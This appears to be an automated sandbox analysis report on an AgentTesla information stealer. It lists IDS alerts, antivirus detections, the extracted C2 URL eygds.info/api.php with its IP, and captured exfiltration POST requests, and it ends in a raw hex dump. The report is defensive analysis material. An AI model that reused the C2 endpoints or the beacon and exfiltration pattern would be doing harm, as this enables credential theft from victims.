2024-12-30T01:59:23.258962+0100	2831192	1	Malware Command and Control Activity Detected	192.168.2.4	50030	156.67.74.96	80	TCP
2024-12-30T01:59:23.258965+0100	2831192	1	Malware Command and Control Activity Detected	192.168.2.4	50029	156.67.74.96	80	TCP
2024-12-30T01:59:23.318745+0100	2831192	1	Malware Command and Control Activity Detected	192.168.2.4	50031	156.67.74.96	80	TCP
2024-12-30T01:59:46.646832+0100	2831192	1	Malware Command and Control Activity Detected	192.168.2.4	50032	156.67.74.96	80	TCP
2024-12-30T01:59:46.646864+0100	2831192	1	Malware Command and Control Activity Detected	192.168.2.4	50033	156.67.74.96	80	TCP
2024-12-30T01:59:46.986248+0100	2831192	1	Malware Command and Control Activity Detected	192.168.2.4	50032	156.67.74.96	80	TCP
2024-12-30T01:59:49.974952+0100	2831192	1	Malware Command and Control Activity Detected	192.168.2.4	50034	156.67.74.96	80	TCP
2024-12-30T01:59:49.974952+0100	2831192	1	Malware Command and Control Activity Detected	192.168.2.4	50035	156.67.74.96	80	TCP
2024-12-30T01:59:50.313831+0100	2831192	1	Malware Command and Control Activity Detected	192.168.2.4	50035	156.67.74.96	80	TCP
2024-12-30T01:59:50.600089+0100	2831192	1	Malware Command and Control Activity Detected	192.168.2.4	50036	156.67.74.96	80	TCP
2024-12-30T01:59:50.951495+0100	2831192	1	Malware Command and Control Activity Detected	192.168.2.4	50036	156.67.74.96	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: ZOYGRL1ePa.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe

Avira: detection malicious, Label: TR/Spy.Agent.lkofd

Found malware configuration

Source: ZOYGRL1ePa.exe

Malware Configuration Extractor: Agenttesla {"Exfil Mode": "Web Panel", "C2 url": "http://eygds.info/api.php"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe

ReversingLabs: Detection: 84%

Multi AV Scanner detection for submitted file

Source: ZOYGRL1ePa.exe	ReversingLabs: Detection: 84%
Source: ZOYGRL1ePa.exe	Virustotal: Detection: 70%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: ZOYGRL1ePa.exe

Joe Sandbox ML: detected

Source: ZOYGRL1ePa.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: ZOYGRL1ePa.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: r\VB.net\stealers\firefoxx64\firefox_f4\obj\Debug\firefox_f4.pdb source: ZOYGRL1ePa.exe, CTF Loader.exe.0.dr
Source:	Binary string: C:\Users\Admin\Desktop\IELibrary\IELibrary\obj\Debug\IELibrary.pdb source: ZOYGRL1ePa.exe, CTF Loader.exe.0.dr

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2831192 - Severity 1 - ETPRO MALWARE AgentTesla Communicating with CnC Server M2 : 192.168.2.4:49731 -> 156.67.74.96:80
Source: Network traffic	Suricata IDS: 2831192 - Severity 1 - ETPRO MALWARE AgentTesla Communicating with CnC Server M2 : 192.168.2.4:49734 -> 156.67.74.96:80
Source: Network traffic	Suricata IDS: 2831192 - Severity 1 - ETPRO MALWARE AgentTesla Communicating with CnC Server M2 : 192.168.2.4:49742 -> 156.67.74.96:80
Source: Network traffic	Suricata IDS: 2831192 - Severity 1 - ETPRO MALWARE AgentTesla Communicating with CnC Server M2 : 192.168.2.4:49732 -> 156.67.74.96:80
Source: Network traffic	Suricata IDS: 2034579 - Severity 1 - ET MALWARE AgentTesla Communicating with CnC Server : 192.168.2.4:49734 -> 156.67.74.96:80
Source: Network traffic	Suricata IDS: 2034579 - Severity 1 - ET MALWARE AgentTesla Communicating with CnC Server : 192.168.2.4:49742 -> 156.67.74.96:80
Source: Network traffic	Suricata IDS: 2034579 - Severity 1 - ET MALWARE AgentTesla Communicating with CnC Server : 192.168.2.4:49731 -> 156.67.74.96:80
Source: Network traffic	Suricata IDS: 2034579 - Severity 1 - ET MALWARE AgentTesla Communicating with CnC Server : 192.168.2.4:49732 -> 156.67.74.96:80
Source: Network traffic	Suricata IDS: 2831192 - Severity 1 - ETPRO MALWARE AgentTesla Communicating with CnC Server M2 : 192.168.2.4:49850 -> 156.67.74.96:80
Source: Network traffic	Suricata IDS: 2831192 - Severity 1 - ETPRO MALWARE AgentTesla Communicating with CnC Server M2 : 192.168.2.4:49849 -> 156.67.74.96:80
Source: Network traffic	Suricata IDS: 2831192 - Severity 1 - ETPRO MALWARE AgentTesla Communicating with CnC Server M2 : 192.168.2.4:49743 -> 156.67.74.96:80
Source: Network traffic	Suricata IDS: 2034579 - Severity 1 - ET MALWARE AgentTesla Communicating with CnC Server : 192.168.2.4:49850 -> 156.67.74.96:80
Source: Network traffic	Suricata IDS: 2034579 - Severity 1 - ET MALWARE AgentTesla Communicating with CnC Server : 192.168.2.4:49849 -> 156.67.74.96:80
Source: Network traffic	Suricata IDS: 2034579 - Severity 1 - ET MALWARE AgentTesla Communicating with CnC Server : 192.168.2.4:49743 -> 156.67.74.96:80
Source: Network traffic	Suricata IDS: 2831192 - Severity 1 - ETPRO MALWARE AgentTesla Communicating with CnC Server M2 : 192.168.2.4:49920 -> 156.67.74.96:80
Source: Network traffic	Suricata IDS: 2034579 - Severity 1 - ET MALWARE AgentTesla Communicating with CnC Server : 192.168.2.4:49920 -> 156.67.74.96:80
Source: Network traffic	Suricata IDS: 2831192 - Severity 1 - ETPRO MALWARE AgentTesla Communicating with CnC Server M2 : 192.168.2.4:49922 -> 156.67.74.96:80
Source: Network traffic	Suricata IDS: 2831192 - Severity 1 - ETPRO MALWARE AgentTesla Communicating with CnC Server M2 : 192.168.2.4:49921 -> 156.67.74.96:80
Source: Network traffic	Suricata IDS: 2034579 - Severity 1 - ET MALWARE AgentTesla Communicating with CnC Server : 192.168.2.4:49921 -> 156.67.74.96:80
Source: Network traffic	Suricata IDS: 2831192 - Severity 1 - ETPRO MALWARE AgentTesla Communicating with CnC Server M2 : 192.168.2.4:49953 -> 156.67.74.96:80
Source: Network traffic	Suricata IDS: 2831192 - Severity 1 - ETPRO MALWARE AgentTesla Communicating with CnC Server M2 : 192.168.2.4:49955 -> 156.67.74.96:80
Source: Network traffic	Suricata IDS: 2831192 - Severity 1 - ETPRO MALWARE AgentTesla Communicating with CnC Server M2 : 192.168.2.4:50001 -> 156.67.74.96:80
Source: Network traffic	Suricata IDS: 2034579 - Severity 1 - ET MALWARE AgentTesla Communicating with CnC Server : 192.168.2.4:50001 -> 156.67.74.96:80
Source: Network traffic	Suricata IDS: 2831192 - Severity 1 - ETPRO MALWARE AgentTesla Communicating with CnC Server M2 : 192.168.2.4:50013 -> 156.67.74.96:80
Source: Network traffic	Suricata IDS: 2034579 - Severity 1 - ET MALWARE AgentTesla Communicating with CnC Server : 192.168.2.4:50013 -> 156.67.74.96:80
Source: Network traffic	Suricata IDS: 2831192 - Severity 1 - ETPRO MALWARE AgentTesla Communicating with CnC Server M2 : 192.168.2.4:50023 -> 156.67.74.96:80
Source: Network traffic	Suricata IDS: 2831192 - Severity 1 - ETPRO MALWARE AgentTesla Communicating with CnC Server M2 : 192.168.2.4:50024 -> 156.67.74.96:80
Source: Network traffic	Suricata IDS: 2034579 - Severity 1 - ET MALWARE AgentTesla Communicating with CnC Server : 192.168.2.4:50023 -> 156.67.74.96:80
Source: Network traffic	Suricata IDS: 2831192 - Severity 1 - ETPRO MALWARE AgentTesla Communicating with CnC Server M2 : 192.168.2.4:50025 -> 156.67.74.96:80
Source: Network traffic	Suricata IDS: 2034579 - Severity 1 - ET MALWARE AgentTesla Communicating with CnC Server : 192.168.2.4:50024 -> 156.67.74.96:80
Source: Network traffic	Suricata IDS: 2831192 - Severity 1 - ETPRO MALWARE AgentTesla Communicating with CnC Server M2 : 192.168.2.4:50026 -> 156.67.74.96:80
Source: Network traffic	Suricata IDS: 2034579 - Severity 1 - ET MALWARE AgentTesla Communicating with CnC Server : 192.168.2.4:50026 -> 156.67.74.96:80
Source: Network traffic	Suricata IDS: 2831192 - Severity 1 - ETPRO MALWARE AgentTesla Communicating with CnC Server M2 : 192.168.2.4:50030 -> 156.67.74.96:80
Source: Network traffic	Suricata IDS: 2831192 - Severity 1 - ETPRO MALWARE AgentTesla Communicating with CnC Server M2 : 192.168.2.4:50031 -> 156.67.74.96:80
Source: Network traffic	Suricata IDS: 2034579 - Severity 1 - ET MALWARE AgentTesla Communicating with CnC Server : 192.168.2.4:50030 -> 156.67.74.96:80
Source: Network traffic	Suricata IDS: 2831192 - Severity 1 - ETPRO MALWARE AgentTesla Communicating with CnC Server M2 : 192.168.2.4:50032 -> 156.67.74.96:80
Source: Network traffic	Suricata IDS: 2034579 - Severity 1 - ET MALWARE AgentTesla Communicating with CnC Server : 192.168.2.4:50032 -> 156.67.74.96:80
Source: Network traffic	Suricata IDS: 2831192 - Severity 1 - ETPRO MALWARE AgentTesla Communicating with CnC Server M2 : 192.168.2.4:49973 -> 156.67.74.96:80
Source: Network traffic	Suricata IDS: 2034579 - Severity 1 - ET MALWARE AgentTesla Communicating with CnC Server : 192.168.2.4:49973 -> 156.67.74.96:80
Source: Network traffic	Suricata IDS: 2831192 - Severity 1 - ETPRO MALWARE AgentTesla Communicating with CnC Server M2 : 192.168.2.4:50036 -> 156.67.74.96:80
Source: Network traffic	Suricata IDS: 2034579 - Severity 1 - ET MALWARE AgentTesla Communicating with CnC Server : 192.168.2.4:50036 -> 156.67.74.96:80
Source: Network traffic	Suricata IDS: 2831192 - Severity 1 - ETPRO MALWARE AgentTesla Communicating with CnC Server M2 : 192.168.2.4:50027 -> 156.67.74.96:80
Source: Network traffic	Suricata IDS: 2034579 - Severity 1 - ET MALWARE AgentTesla Communicating with CnC Server : 192.168.2.4:50027 -> 156.67.74.96:80
Source: Network traffic	Suricata IDS: 2831192 - Severity 1 - ETPRO MALWARE AgentTesla Communicating with CnC Server M2 : 192.168.2.4:50029 -> 156.67.74.96:80
Source: Network traffic	Suricata IDS: 2034579 - Severity 1 - ET MALWARE AgentTesla Communicating with CnC Server : 192.168.2.4:50029 -> 156.67.74.96:80
Source: Network traffic	Suricata IDS: 2831192 - Severity 1 - ETPRO MALWARE AgentTesla Communicating with CnC Server M2 : 192.168.2.4:49952 -> 156.67.74.96:80
Source: Network traffic	Suricata IDS: 2831192 - Severity 1 - ETPRO MALWARE AgentTesla Communicating with CnC Server M2 : 192.168.2.4:50034 -> 156.67.74.96:80
Source: Network traffic	Suricata IDS: 2831192 - Severity 1 - ETPRO MALWARE AgentTesla Communicating with CnC Server M2 : 192.168.2.4:50035 -> 156.67.74.96:80
Source: Network traffic	Suricata IDS: 2831192 - Severity 1 - ETPRO MALWARE AgentTesla Communicating with CnC Server M2 : 192.168.2.4:50033 -> 156.67.74.96:80
Source: Network traffic	Suricata IDS: 2034579 - Severity 1 - ET MALWARE AgentTesla Communicating with CnC Server : 192.168.2.4:50033 -> 156.67.74.96:80
Source: Network traffic	Suricata IDS: 2831192 - Severity 1 - ETPRO MALWARE AgentTesla Communicating with CnC Server M2 : 192.168.2.4:49972 -> 156.67.74.96:80
Source: Network traffic	Suricata IDS: 2034579 - Severity 1 - ET MALWARE AgentTesla Communicating with CnC Server : 192.168.2.4:50035 -> 156.67.74.96:80
Source: Network traffic	Suricata IDS: 2034579 - Severity 1 - ET MALWARE AgentTesla Communicating with CnC Server : 192.168.2.4:49972 -> 156.67.74.96:80
Source: Network traffic	Suricata IDS: 2831192 - Severity 1 - ETPRO MALWARE AgentTesla Communicating with CnC Server M2 : 192.168.2.4:50028 -> 156.67.74.96:80
Source: Network traffic	Suricata IDS: 2831192 - Severity 1 - ETPRO MALWARE AgentTesla Communicating with CnC Server M2 : 192.168.2.4:50002 -> 156.67.74.96:80
Source: Network traffic	Suricata IDS: 2034579 - Severity 1 - ET MALWARE AgentTesla Communicating with CnC Server : 192.168.2.4:50002 -> 156.67.74.96:80
Source: Network traffic	Suricata IDS: 2034579 - Severity 1 - ET MALWARE AgentTesla Communicating with CnC Server : 192.168.2.4:50034 -> 156.67.74.96:80

Yara detected Generic Downloader

Source: Yara match	File source: ZOYGRL1ePa.exe, type: SAMPLE
Source: Yara match	File source: 0.0.ZOYGRL1ePa.exe.b36c88.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.ZOYGRL1ePa.exe.b20000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe, type: DROPPED

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: checkip.dyndns.orgConnection: Keep-Alive

Source: Joe Sandbox View

IP Address: 158.101.44.242 158.101.44.242

Source: Joe Sandbox View

ASN Name: TESONETLT TESONETLT

Source: unknown

DNS query: name: checkip.dyndns.org

Source: global traffic	HTTP traffic detected: POST /api.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: eygds.infoContent-Length: 286Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /api.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: eygds.infoContent-Length: 318Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: eygds.infoContent-Length: 322Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: eygds.infoContent-Length: 586Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /api.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: eygds.infoContent-Length: 286Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /api.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: eygds.infoContent-Length: 318Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: eygds.infoContent-Length: 586Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /api.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: eygds.infoContent-Length: 924Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: eygds.infoContent-Length: 286Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: eygds.infoContent-Length: 124322Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: eygds.infoContent-Length: 320Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /api.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: eygds.infoContent-Length: 286Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /api.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: eygds.infoContent-Length: 132578Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /api.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: eygds.infoContent-Length: 286Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: eygds.infoContent-Length: 318Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: eygds.infoContent-Length: 124324Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /api.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: eygds.infoContent-Length: 318Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: eygds.infoContent-Length: 286Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: eygds.infoContent-Length: 124322Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: eygds.infoContent-Length: 286Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: eygds.infoContent-Length: 318Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: eygds.infoContent-Length: 124324Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: eygds.infoContent-Length: 286Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: eygds.infoContent-Length: 318Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: eygds.infoContent-Length: 286Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: eygds.infoContent-Length: 286Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: eygds.infoContent-Length: 124324Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: eygds.infoContent-Length: 318Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: eygds.infoContent-Length: 286Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /api.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: eygds.infoContent-Length: 132622Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /api.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: eygds.infoContent-Length: 286Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: eygds.infoContent-Length: 318Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: eygds.infoContent-Length: 124714Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /api.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: eygds.infoContent-Length: 286Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: eygds.infoContent-Length: 318Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: eygds.infoContent-Length: 124284Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: eygds.infoContent-Length: 286Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: eygds.infoContent-Length: 318Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: eygds.infoContent-Length: 124284Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: eygds.infoContent-Length: 318Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: eygds.infoContent-Length: 286Expect: 100-continue

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: eygds.info

Source: unknown

HTTP traffic detected: POST /api.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: eygds.infoContent-Length: 286Expect: 100-continueConnection: Keep-Alive

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: Keep-AliveKeep-Alive: timeout=5, max=100content-type: text/htmllast-modified: Thu, 30 Sep 2021 12:49:03 GMTetag: "999-6155b23f-9b1e2da8109d46d3;;;"accept-ranges: bytescontent-length: 2457date: Mon, 30 Dec 2024 00:57:11 GMTserver: LiteSpeedplatform: hostingerpanel: hpanelData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 20 70 72 65 66 69 78 3d 22 63 6f 6e 74 65 6e 74 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 72 73 73 2f 31 2e 30 2f 6d 6f 64 75 6c 65 73 2f 63 6f 6e 74 65 6e 74 2f 20 64 63 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 64 63 2f 74 65 72 6d 73 2f 20 66 6f 61 66 3a 20 68 74 74 70 3a 2f 2f 78 6d 6c 6e 73 2e 63 6f 6d 2f 66 6f 61 66 2f 30 2e 31 2f 20 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 20 72 64 66 73 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 30 31 2f 72 64 66 2d 73 63 68 65 6d 61 23 20 73 69 6f 63 3a 20 68 74 74 70 3a 2f 2f 72 64 66 73 2e 6f 72 67 2f 73 69 6f 63 2f 6e 73 23 20 73 69 6f 63 74 3a 20 68 74 74 70 3a 2f 2f 72 64 66 73 2e 6f 72 67 2f 73 69 6f 63 2f 74 79 70 65 73 23 20 73 6b 6f 73 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 34 2f 30 32 2f 73 6b 6f 73 2f 63 6f 72 65 23 20 78 73 64 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 23 22 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 